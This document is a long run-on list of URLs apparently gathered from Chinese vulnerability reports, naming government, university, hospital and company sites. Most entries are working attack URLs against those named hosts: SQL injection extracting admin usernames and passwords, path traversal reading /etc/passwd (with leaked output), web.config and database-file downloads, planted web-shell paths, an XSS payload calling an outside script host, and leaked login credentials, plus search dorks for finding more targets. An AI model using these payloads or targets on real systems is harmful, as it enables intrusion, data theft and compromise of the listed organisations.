http://sme.ujs.edu.cn//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.jiathis.com/code/swf/m.swf http://souke.jiajiaoban.com/ http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1/sex:/status inurl:searchs/search/tuiguang http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1/sex:/status http://souke.jiajiaoban.com/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1*/sex:/status http://souke.jiajiaoban.com:80/searchs/search/tuiguang:/kemu:/nianji:/xuequ:/teachername:1% sex:/status http://www.timber2005.com/Product_sy.html http://exam1.timber2005.com/login.aspx http://exam1.timber2005.com/system/system_config.aspx http://zx.gzzkzsw.com/UpLoad/System/20140914164100746093.aspx http://cellphoneversionrouter.unicompayment.com:55351/payfront_vercontrol/verControl.action http://kczx.gzhu.edu.cn/course_center/index/ inurl:course_center/index http://www.elut.cn/works.html http://www.sunrisingbelt.com/about.asp?keyno=437 http://www.jayee-fitting.com/about.asp?keyno=454 http://www.hnttex.com/about.asp?keyno=481 http://www.dgzhuoshun.com/about.asp?keyno=481 http://www.kleansource.com/about.asp?keyno=481 http://www.lonova-ele.com/about.asp?keyno=481 http://www.wisevigor.com/about.asp?keyno=481 http://www.easymechem.com/about.asp?keyno=481 http://www.printingbetter.com/about.asp?keyno=481 http://www.u-win.hk/about.asp?keyno=454 http://www.uniquelock.cn/about.asp?keyno=437 http://www.todobelt.com/about.asp?keyno=611 http://www.dongqianlake-packaging.com/about.asp?keyno=481 http://www.jgsanitaryware.com/about.asp?keyno=481 http://www.houseleadercorp.com/about.asp?keyno=453 http://www.fashion-accessories.com.cn/about.asp?keyno=481 http://www.cnwoodytoys.com/about.asp?keyno=481 http://www.ashine-tech.com/about.asp?keyno=437 http://www.hxibearing.com/about.asp?keyno=481 http://www.chuangguan.net/about.asp?keyno=481 http://www.atrunk.com/about.asp?keyno=481 http://www.wintimes.net/about.asp?keyno=481 http://www.maytelecom.com/about.asp?keyno=481 http://www.mlecobag.com/about.asp?keyno=481 http://www.chengyitex.com/about.asp?keyno=481 http://www.berhon.com/about.asp?keyno=481 http://tui8980-.rygit.com的钓鱼网站,如图6。 http://xgb.lzu.edu.cn/AdminLogin.aspx http://xb.xytc.edu.cn/bulletin/display_all/download.asp?code=20140508180449&sub_code=25 http://xb.xytc.edu.cn/systemmanager/login.asp http://59.73.148.27:8080/bj_client/InfoMastSelect.aspx?ID=275 http://211.64.123.12/bj_client/InfoMastSelect.aspx?ID=247 http://202.204.190.42/oa_client/InfoMastSelect.aspx?ID=352 http://vrs.lib.xju.edu.cn/oa_client/App_Pages/App_page/InfoMastSelect.aspx?id=115 http://lib.xjmu.edu.cn/oa_client/InfoMastSelect.aspx?ID=272 http://lib.heuet.edu.cn:8080/oa_client/InfoMastSelect.aspx?ID=174 http://www.meilishuo.com/log.txt http://jw1.njau.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://219.148.85.172:9080/reportFiles/cj/cj_zwcjd.jsp http://jwxt.sxau.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://180.201.80.1/reportFiles/cj/cj_zwcjd.jsp http://www.fjnh.gov.cn/xxgk/xx_Search.asp?Unit_ID=15 http://www.dxwsj.gov.cn/show_news.asp?ID=3246 http://www.gzpf.gov.cn/pf/program/html/site_news_content.php?SiteID=1&ItemID=536042407&ID=903 http://www.jllh.gov.cn/el/dis_news.php?disis=202 http://www.ahcss.gov.cn/include/web_content.php?id=2061 http://www.systats.gov.cn/ndtjgb_page.php?xuh=1697 http://www.gz.stats.gov.cn/SurveyInfo/VotesTheme.aspx?id=1 http://www.longxi.gansu.gov.cn/showxw.asp?id=14040 http://www.snsanyuan.gov.cn/knry.jsp?urltype=news.NewsContentUrl&wbtreeid=1054&wbnewsid=29277 http://www.hljboli.gov.cn/mome.asp?id=1 http://www.ssap.com.cn/SKWX/Job_list.aspx?type=1 http://pay.mobile.sina.cn/nc/third_pay/third_pay_alipay_get.php?mobile=&fee=3C8i9zDVchc%3D&business_id=309 http://jf.js118114.com/SearchList.aspx?sc=3000_5000 http://jf.js118114.com/SearchList.aspx?sc=3000_5000 http://ego10000.com/ajax_check_user.php?email= http://ce.wooyun.org/project/6 http://ce.wooyun.org/content/3432 http://ota.pay.mobile.sina.cn/platform/orderConfirm.php?sessionId=6756219&paymentTag=alipayAccount http://www.jljcxy.com/thirdparty/apprise/testdetail.jsp?s=%25E6%2595%2599%25E5%258A%25A1%25E5%25A4%2584 http://chinafoundation.org.cn/search?m=213&t=3 http://chinafoundation.org.cn/findxm?areaid=1 http://chinafoundation.org.cn/findxm http://chinafoundation.org.cn/readnb?jjhid=4028e5fe35c1cdd60135c1d441c95042&y=2011 http://chinafoundation.org.cn/search http://chinafoundation.org.cn/jrwm?id=256 http://chinafoundation.org.cn/foundationrecruitmentviewinfo?id=29072 http://chinafoundation.org.cn/jjhzp?a.wage=0 http://chinafoundation.org.cn/jjhzp?a.foreignLangauge=0 http://chinafoundation.org.cn/jjhzp?a.education=0 http://chinafoundation.org.cn/jjhzp?a.workType=0 http://chinafoundation.org.cn/search?ztid=15509&m=3856&t=3 http://chinafoundation.org.cn/readxmrz?id=4028e5e5382864f001388ef105e20207 http://chinafoundation.org.cn/search?m=25181 http://chinafoundation.org.cn/jjhzp?a.type=0 http://chinafoundation.org.cn/readzt?id=15509 http://chinafoundation.org.cn/searchgdinfo?table=JJH_NJ_SITUATION&line=insConclusion http://chinafoundation.org.cn/readjjh?id=4028e5fe35c1cdd60135c1d441c95042 http://chinafoundation.org.cn/readnb?jjhid=4028e5fe35c1cdd60135c1d441c95042&y=2011 http://chinafoundation.org.cn/searchgdinfo?table=JJH_REGISTRATION http://chinafoundation.org.cn/search?jjhid=4028e5fe35c1cdd60135c1d441c95042&m=3720 http://chinafoundation.org.cn/ccms/search?m=213&t=3 http://chinafoundation.org.cn/ccms/findgov?sheng=1 http://chinafoundation.org.cn/ccms/findxm?areaid=1 http://chinafoundation.org.cn/ccms/jrwm?id=256 http://chinafoundation.org.cn/ccms/foundationrecruitmentviewinfo?id=29072 http://chinafoundation.org.cn/ccms/jjhzp?a.workAddress=1 http://chinafoundation.org.cn/ccms/jjhzp?a.foreignLangauge=0 http://chinafoundation.org.cn/ccms/jjhzp?a.workType=0 http://chinafoundation.org.cn/ccms/search?m=25181 http://chinafoundation.org.cn/ccms/readzt?id=15509 http://www.hulianpay.com/ www.sipmch.com.cn/yqyzfweb/consultant/gzjdmore.aspx http://mail.hunantv.com.cn http://wooyun.org/bugs/wooyun-2010-061894 http://mail.hunantv.com.cn/webmail/getPass.php?email=bianxingji@hunantv.com&update=s http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00ce3topic&url=post002 lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts%00ce3topic&url=post002 http://www.coop.ln.gov.cn/info.asp?id=4413 http://www.yiliang.gov.cn/info.asp?id=723 http://www.yiliang.gov.cn/info.asp?id=723 http://www.yiliang.gov.cn/info.asp?id=723 http://bbs.chexun.com/3g/view.php?tid=655201 http://bbs.chexun.com/3g/view.php?tid=655202 http://bbs.chexun.com/3g/view.php?tid=655203 http://www.95590.cn/ebiz/view/userskin/findPwdSkin.jsp http://riem.swufe.edu.cn/riem/info.asp?id=67 http://zjc.zjwchc.com/jiuye/Info.asp?Id=17 http://www.sxtvu.cn/newss/info.asp?id=2633 http://www.transmed.org.cn/news-info.asp?id=36 http://www.tbts.edu.tw/eng/about.php?nid=5 http://me.07073.com/userinfo/gzhy/用户id,遍历id,关注所有账户,所有账户弹下窗也是挺好的,不知道二哥的水坑攻击是怎么做的。 http://ydbd.yandu.gov.cn/view_content.asp?article_bianhao=20110621041 http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Buct http://smba.mbachina.com/Buct http://smba.mbachina.com/Buct http://smba.mbachina.com/Cass http://smba.mbachina.com/Cass http://smba.mbachina.com/Cass http://smba.mbachina.com/Cau http://smba.mbachina.com/Cau http://smba.mbachina.com/Cau http://smba.mbachina.com/Cupl http://smba.mbachina.com/Cupl http://smba.mbachina.com/Cupl http://smba.mbachina.com/User/Saveuser http://smba.mbachina.com/bit http://smba.mbachina.com/bit http://smba.mbachina.com/bit http://smba.mbachina.com/uibe http://smba.mbachina.com/uibe http://smba.mbachina.com/uibe http://crm.varsal.com.cn:8081/login/login.php http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system cn:8081 http://60.12.94.190/ywzc/login.jsp http://58.22.154.146:1001/lookup/seldt.asp http://www.rcsjyw.cn http://www.rcsjyw.cn/UserList.asp获取一个用户登录了。才能上传。 inurl:info_Print.asp?ArticleID= http://www.cstqxx.com http://zq.17173.com/c9/simulator-v2/list.php?plan_type=&class1=HUNTER&class2=&order=case inurl:bulletinBrowse.jsp?Id= http://yx.cau.edu.cn/bulletinBrowse.jsp?Id=34d7de69-301b-11e4-b061-737b79faefa5 http://yx.tjfsu.edu.cn/bulletinBrowse.jsp?Id=0cb2b864-0c9f-11e4-b0f7-3ff030a1e3c7 http://yingxin.ncepu.edu.cn/bulletinBrowse.jsp?Id=7083c9c4-14c3-11e3-b0cf-4f749c89c2ed https://my.cau.edu.cn/bulletinBrowse.jsp?Id=827b4143-31b3-11e4-b271-a1fcfaa213ec http://yx.hlju.edu.cn/bulletinBrowse.jsp?Id=597f7c7f-05a4-11e4-9486-f3f9755d003c%20%27 http://xinquban.henau.edu.cn/onews.asp?id=806 http://xiaoyou.henau.edu.cn/NewsDetail.asp?id=956 http://yancao.henau.edu.cn/about.asp?id=279 http://admin.mei.hitao.com http://msc.fdsm.fudan.edu.cn/?m=course&a=see&id=127 http://msc.fdsm.fudan.edu.cn/admin http://login.nanofab.fudan.edu.cn/exe/php/system/login.php http://www.ias.fudan.edu.cn/File.aspx?filepath=ArticleUpload/20122291021141555.doc http://www.cs.fudan.edu.cn/wp-content/uploads/ http://ee.fudan.edu.cn/electron/admin/ http://radio.fudan.edu.cn/fenglin/radio/ http://xwsys.fudan.edu.cn/cg/web/2013/ http://biotechlab.fudan.edu.cn/database/ http://www.stuaff.fudan.edu.cn/vote/files/2014/ http://www.ccgp-hainan.gov.cn/zxdt-m1.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/gwdt-m.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/allgg1.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=182569&articleid=10000250556&difang=hainan http://www.ccgp-hainan.gov.cn/cgbxdetail.jsp?condition=10000439652&difang=hainan http://www.ccgp-shenzhen.gov.cn/allgg.jsp?difang=shenzhen http://www.ccgp-shenzhen.gov.cn/detail.jsp?condition=szhen0009&difang=shenzhen http://www.ccgp-shenzhen.gov.cn/allgg1.jsp?difang=shenzhen http://www.xinnet.com/domain/guohuapply.do?method=streamImage&id=2&type=1 http://www.baidu.com/s?wd=%E8%AF%B7%E5%AE%8C%E5%96%84%E6%82%A8%E7%9A%84%E8%B4%A6%E6%88%B7%E4%BF%A1%E6%81%AF%EF%BC%9A%E6%9F%A5%E6%94%B6%E7%8E%B0%E9%87%91 http://www.baidu.com/s?wd=%E6%82%A8%E5%8F%AF%E7%94%A8%E7%A7%AF%E5%88%86%E5%B7%B2%E5%85%91%E6%8D%A2%E7%8E%B0%E9%87%91%EF%BC%9A368.00%E5%85%83 http://www.baidu.com/s?wd=%E6%82%A8%E5%8F%AF%E7%94%A8%E7%A7%AF%E5%88%86%E5%B7%B2%E5%85%91%E6%8D%A2%E7%8E%B0%E9%87%91%3A1065.00%E5%85%83 http://钓鱼网址/admin/login.html http://www.healwis.com/admin/ http://alumni.lnpu.edu.cn/servlet/jyjjjjjjServlet?method=jyjjdisplay&id=2 http://test.lashoupay.com/拉手的一个后台 http://59.151.89.9/index.php/Login http://59.151.89.65/ http://59.151.89.13/login http://59.151.89.65/help.html cn:8028 http://eoffice8.weaver.cn:8028 http://gdy.gdmc.edu.cn/rsc/rczp.asp?classid=30 http://www.fszxyy.com/Data/DvSQLLOG.mdb http://www.fszxyy.com/Data/IPaddress.mdb http://www.fszxyy.com/data/dvbbs8.mdb http://www.fszxyy.com/bbs/boke/Data/Dvboke.mdb http://www.fszxyy.com/bbs/data/dvbbs8.mdb http://202.110.202.171:8080/common/shell/ http://www.mbachina.com/down.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://219.146.3.91:9001/servlet/download.action?fileName=../jsp/welcome.jsp http://219.146.3.91:9001/servlet/download.action?fileName=../../struts.xml http://219.146.3.91:9001/servlet/download.action?fileName=../error.jsp http://219.146.3.91:9001/servlet/download.action?fileName=../index.jsp http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/QXYS/newsList.aspx?CategoryId=56 http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/ZWGK/getnewslist.aspx?CategoryId= http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/QXYS/newsList_media.aspx?CategoryId=53 http://design.weather.com.cn/view_design.php?id=369 http://photo.weather.com.cn/photoUp/view_summer_2014.php?id=129546 http://www.diancms.com/user/message/ReadMessage.aspx?Id=55 http://www.kj-hospital.com/ny.asp http://www.fszxyy.com/expertcontent.asp?id=72 http://60.161.215.7:8888/main.aspx http://ysjk.jiankang.cn/ http://ysjk.jiankang.cn/?act=mec&id=60 http://www.jynsh.com/ http://www.jynsh.com/show.php?id=22495&cid=238 http://183.136.160.228 http://jh.zmzb.com/WebForms/Frame/Login.aspx http://jh.zmzb.com/webforms/bt/btreportingplanview.aspx http://photo.weather.com.cn/photoUp/2013sy_spring.php http://photo.weather.com.cn/photoUp/upload/spring2013/cwp/news/201409161147081.jpg/0.php http://8.weicaifu.com http://forum.weibopay.com http://8.weicaifu.com/uc_server/admin.php?sid=d725DAXiX7bPw9P6zxBwD9XNnMK4o8W7jEQ0PCs3piarxGZkkB%2F5KKZd7WEmKV5tztbURxWmNZr45w http://8.weicaifu.com/ http://183.136.160.207:8088/cluster/nodes http://183.136.160.207:8088/logs/ http://loudong.rising.com.cn/SearchBug.aspx?s=xss http://loudong.rising.com.cn/SearchBug.aspx?s=%26lt;script%20src=//20.rs%26gt;%26lt;/script%26gt http://gd.10086.cn/shadu/kvweb/index.jsp http://gd.10086.cn/shadu/servlet/QuestionNoteServlet http://gd.10086.cn/shadu/servlet/QuestionNoteServlet http://www.xinnet.com/user/user.do?method=toFindPwd http://www.xinnet.com/user/user.do?method=findPwdNew&findPwdStep=step1 http://www.xinnet.com/user/user.do?method=findPwdNew&findPwdStep=step2 https://fm.163.com/bbs/viewthread.php?tid=689187&pid=729698&page=3 http://wooyun.org/bugs/wooyun-2014-076171 http://www.rcwl.net/b/tea/bag_batch_input.jsp?hasChildType=1&typeId=1 http://www.rcwl.net/b/tea/bag_batch_input.jsp?hasChildType=1&typeId=1 http://wap.foundationcenter.org.cn/FoundView.asp?FoundStr=1&Find=yes&page=1&Id=1424 http://wap.foundationcenter.org.cn/FoundFindList.asp http://www.95590.cn/lpwd/hbdg/tj/index.shtml#anchor http://www.95590.cn/ebiz/view/onlineser/sendSMSMessage.jsp?network=%E9%9D%99%E6%B5%B7%E6%94%AF%E5%85%AC%E5%8F%B8&address=%E5%A4%A9%E6%B4%A5%E5%B8%82%E9%9D%99%E6%B5%B7%E5%8E%BF%E4%B8%9C%E6%96%B9%E7%BA%A2%E8%B7%AF%E9%87%91%E6%B5%B7%E5%9B%AD1%E5%8F%B7%E6%A5%BC%E5%BA%95%E5%95%86S17%E5%8F%B7&telephone=022-59580201 http://www.95590.cn/ebiz/view/onlineser/sendSMSMessage.jsp?_action=sendOnlineSerMessage&address=%E4%BD%A0%E5%AE%B6&expiredTimeWithSecond=60&mobile=XXXX&network=%E4%B9%8C%E4%BA%91&sysTime=0&telephone=110 http://".$_SERVER['HTTP_HOST http://www.chaohu.gov.cn/newrevision/gov_option_result_list.aspx?option_id=13 http://www.chaohu.gov.cn/manage/login.aspx http://219.247.199.37/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://180.168.106.102:8300/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://zdpd.stiei.edu.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.qyzx.mhedu.sh.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://xfz.shetms.com/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.gzmj.net.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.so.com/s?q=技术支持:南京杰诺瀚软件科技有限公司&pn=6&j=0&ls=0&src=srp_paging&fr=se6_drag&psid=fd6d2e7d82880c6dc196c2c8a1252a12 http://www.gjmzyfs.com/Web/Login.aspx http://www.lcsjwk.com/Web/Login.aspx http://www.jsnyxb.com/Web/Login.aspx http://ctc.hlglzz.com/Web/Login.aspx http://xb.cuit.edu.cn/Web/Login.aspx www.cnemergency.com http://www.cnemergency.com http://www.sd.10086.cn/eMobile/firstLogin.action?menuid= http://www.hhly.gov.cn/home/page.php?id=1,参数id存在注入 admin:iceflow,后台管理如图 http://61.4.185.26/ http://61.4.185.26:8080/userCommonAction!login.action http://wooyun.org/bugs/wooyun-2014-067982 http://wooyun.org/bugs/wooyun-2010-067982 inurl:viewList.aspx?typeid= http://free-100.net/searchLines.aspx?LStartDate= http://free-100.net/triplist.aspx?typeID=1 http://free-100.net/tripCity.aspx?cityid=12 http://free-100.net/searchLines.aspx?LStartDate=&page=1 http://free-100.net/viewList.aspx?typeid=2 http://free-100.net/searchLines.aspx?toAdd=%e6%8b%89%e8%90%a8&page=1 http://free-100.net/viewList.aspx?typeid=2 http://www.sqlmap.org http://jj.cust.edu.cn/news-every.asp?id=366 http://businessinfo.co.uk/labs/xss/xss.swf http://www.xmbtn.com/webepg/riqi.jsp?serviceid=4103 inurl:/opac/book/do.jsp?method http://118.122.113.7:8080/opac/rss/do.jsp?marcType=1&callNumber=&intDay=1&rang=50 http://211.167.243.154:7001/iss/ http://211.167.243.154:7001/iss/uploadfile/images/710956e634124f4395754935a6279db0.jsp http://vps.myxinnet.com/html/index.html http://bond.money.hexun.com/iframe/bond2-1.aspx?bondtype=1&col=8&orderby=asc&selDate=2011-12-30 http://mall.cqcbank.com http://zscx.buu.edu.cn/login.aspx?id=18 http://119.10.114.149 http://61.155.153.248:28099 http://114.112.53.45:28099 http://ee.xjtu.edu.cn/new_ee/ee_admin/log/register.php http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0207 http://www.hengdong.gov.cn/sssweb/DirectoryPublic/Main.aspx?deptid=DDD080’ https://ip/excel/user_export.php https://ip/excel/server_export.php https://ip/excel/sso_user_export.php?rsname= http://www.njrc168.com/Main/NewsDetail.aspx?ID=113 www.cicro.com使用了WebCarrier http://kas.knet.cn/ http://10.12.6.34/xinnet/xinnetOL http://10.12.6.34/xinnet/xinnetOLFRONT http://10.12.6.34/xinnet/xinnetOLBACK http://10.12.6.34/xinnet/xinnetmis http://10.12.6.34/xinnet/cbi_dns http://10.12.6.34/xinnet/XinnetSystem http://10.12.6.34/xinnet/commonSupport http://10.12.6.34/xinnet/vpsManage http://agent.xinnet.com/ipCheck/y785718/w4u8tuejioa23/x136835.do?method=ipCheckLogin http://hymanage.xinnet.com/ http://manage.xinnet.com/ http://www.ctnma.cn http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= www.XXXX.com http://www.nnfls.cn:8080/ http://www.nnfls.cn:8080/yznetdata/ http://www.nnfls.cn:8080/yznetdata/wooyun.txt http://tgou.voc.com.cn/admin/index.php http://xxx/fileUploadDownloadAction.do?actionType=1 http://www.pusicapital.com/touzi.aspx?m=20120809134728990913 http://www.pusicapital.com/ProjectList.aspx?m=20120809135804757952 http://www.pusicapital.com/newlist.aspx?m=20120809135923100964 http://www.pusicapital.com/contactus.aspx?m=20120809135247257925 http://www.pusicapital.com/NewInfo.aspx?n=20140815151723937640&m=20120809135923100964 http://www.pusicapital.com/ProjectInfo.aspx?n=20140808155313280617&m=20120809135804757952 http://www.pusicapital.com/TeamInfo.aspx?n=20120830140306120130&m=20120809135500240940 http://www.pusicapital.com/Team.aspx?m=20120809135500240940 http://www.pusicapital.com/eng/touzi.aspx?m=20120912085859013156 http://www.pusicapital.com/eng/AboutUs.aspx?m=20120912090725857171 http://www.pusicapital.com/eng/Newlist.aspx?m=20120912093431700189 http://www.pusicapital.com/eng/contactus.aspx?m=20120912090325967168 http://www.pusicapital.com/eng/ProjectInfo.aspx?n=20140808160014687622&m=20120912093250920186 http://www.pusicapital.com/eng/TeamInfo.aspx?n=20121012131936013245&m=20120912092623390180 http://www.pusicapital.com/eng/Team.aspx?m=20120912092623390180 http://www.pusicapital.com/eng/NewInfo.aspx?n=20120912104910530209&m=20120912093431700189 http://www.pusicapital.com/eng/ProjectList.aspx?m=20120912093250920186 http://www.pusicapital.com/tzcl.aspx?m=20120809134809380916 http://www.pusicapital.com/eng/tzcl.aspx?m=20120912085926170159 http://www.pusicapital.com/ProjectInfo.aspx?n=20140808155313280617&m=20120809135804757952 http://www.pusicapital.com/TeamInfo.aspx?n=20120830140306120130&m=20120809135500240940 http://www.pusicapital.com/NewInfo.aspx?n=20140815151723937640&m=20120809135923100964 http://www.pusicapital.com/eng/ProjectInfo.aspx?n=20140808160014687622&m=20120912093250920186 http://www.pusicapital.com/eng/TeamInfo.aspx?n=20121012131936013245&m=20120912092623390180 http://www.pusicapital.com/eng/NewInfo.aspx?n=20120912104910530209&m=20120912093431700189 http://support.umeng.com/.git/config http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?editId=2&action=listLoad http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=modify http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=delete http://60.221.230.87/20144517014514.asp;.txt http://124.115.221.71/ http://124.115.221.71/20144517014514.asp;.txt http://kh.shikee.com/index.php http://www.ssfdc.gov.cn/static.php?id=1 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/NoticeShow.aspx?id=1086 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/RecruitmentShow.aspx?id38=50833 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/JobGuidenceShow.aspx?id=565 http://shop.taihainet.com/group/message.php?act=1 http://shop.taihainet.com/group/link.php?act=go&city=fujian&url=1 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018 http://www.nmgslw.gov.cn/info/infoView.jsp?idcontent=4762 http://beian.cndns.com/ http://beian.cndns.com/icpadmin.php?module=admin_icp_hshow&id=123 http://219.143.235.50:80/ http://219.143.235.50/20144517014514.asp;.txt www.jt168.com http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.2.x/docs/s2-005.html http://www.nenu.edu.cn/professor/pro/yul/c_print.php?id=154 http://www.target.com//weaver/weaver.email.FileDownloadLocation?fileid=附件ID&download=1 http://gl.triolion.com/ http://zmoa.warom.com:801/ http://www.yzjoa.com/ http://oa.nws.gov.cn/ http://www.cweme.net/ http://cyoa.warom.com:803/ http://220.248.243.186:8081/ http://sys.cdc.zj.cn/ http://cygf.warom.com:805/ http://oa.cncie.com/ http://oa.uuzz.com/ http://oa.hnnc.net:82/ http://oa.yangtzeu.edu.cn/ http://oaf.yitoa.com:6688/ http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://zmoa.warom.com:801/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://www.yzjoa.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://www.cweme.net/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://cyoa.warom.com:803/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://sys.cdc.zj.cn/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://cygf.warom.com:805/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oa.cncie.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oa.uuzz.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oaf.yitoa.com:6688/weaver/weaver.email.FileDownloadLocation?fileid=1201*&download=1 http://oa.nws.gov.cn/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1 http://oa.hnnc.net:82/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1 http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://gl.triolion.com/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2 http://220.178.0.180/infoms/identity/index.c http://218.76.27.109/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/identity/index.c http://202.119.175.107/infoms/identity/index.c http://58.213.129.204/infoms/ http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1 http://www.yiban.cn/msg/sys?kind=114,kind存在注入 http://t5.edusoho.cn/group/2/thread/7?page=1#post-85 http://review.train.gov.cn/ http://review.train.gov.cn/Index/Index/viewNews/id/33 http://oa.fun.tv/ www.***.com/admin%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://www.xxx.com/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.xxx.com/admin/FCKeditor/editor/filemanager/connectors/test.html http://www.myhack58.com/Article/html/3/62/2012/33638.htm http://www.jiangxi.gov.cn/dtxx/tjdt/201202/t20120215_693074.htm http://59.53.172.250:8080/ http://59.53.172.250:8080/20144517014514.asp;.txt http://www.jjtonline.com/login.action执行地址 http://csyb100.mycomb.com/web/csyb100/files/test22.asp密码:1 http://csyb100.mycomb.com/web/csyb100/files/asp%281%29.asp http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://oa.xndxfz.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.wxzzyey.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://ww1980.cqjjzx.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.czlcxx.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://218.7.20.50:80/ http://jy.gdgs.gov.cn/shownews.asp?id=526 http://jy.gdgs.gov.cn/upfile_photo.asp http://hzzcpd.train.gov.cn/ http://hzzcpd.train.gov.cn/Home/Index/viewNews/id/2447 http://kh.shikee.com/ http://www.comingchina.com/ http://www.comingchina.com/html/downloads/ http://www.comingchina.com/download/soft/U-Mail9.8.56.zip site:dapu.com http://www.dapu.com/product-askdetail-664*-18912*.html http://sqlmap.org http://m.dapu.com/mgallery-items--1.html?scontent=%E9%95%BF http://m.dapu.com/mgallery-items--1.html?scontent=%E9%95%BF http://sqlmap.org http://tpupdate.chanjet.com/TPlus/login.htm ip:58.44.223.247 http://mail.scichina.org/的一个弱口令帐户:info/info2014 http://www.qyszxxz.com/list.jsp?classid=36&preid=17 http://202.100.85.100/list.jsp?preid=240&classid=247 http://www.ldlyy.com/sub_detail.jsp?classid=29&preid=1 http://www.gsjkjy.org.cn/mail_detail.jsp?id=6 http://202.100.85.100/list.jsp?preid=240&classid=247为例证明如下 http://www.gsblood.com/甘肃省血液中心 http://www.qyszxxz.com/庆阳市中心血站 http://www.jcsxz.com/金昌市中心血站 http://www.jygsyy.com/嘉峪关市第一人民医院 http://www.lzfybj.cn/兰州市妇幼保健院 http://www.qyszyy.com/庆阳市中医医院 http://www.lxzfby.com/临夏州妇幼保健院 http://www.gsfybjy.com/甘肃省妇幼保健院 http://www.qyfybj.com/庆阳市妇幼保健院 www.xxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.lzfybj.cn/为例证明: http://www.lzfybj.cn//FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.lzfybj.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=File/ http://qy.gsws.gov.cn/admin/webedit/admin_login.asp http://ww.gsws.gov.cn/admin/webedit/admin_login.asp http://ts.gsws.gov.cn/admin/webedit/admin_login.asp http://ln.gsws.gov.cn/admin/webedit/admin_login.asp 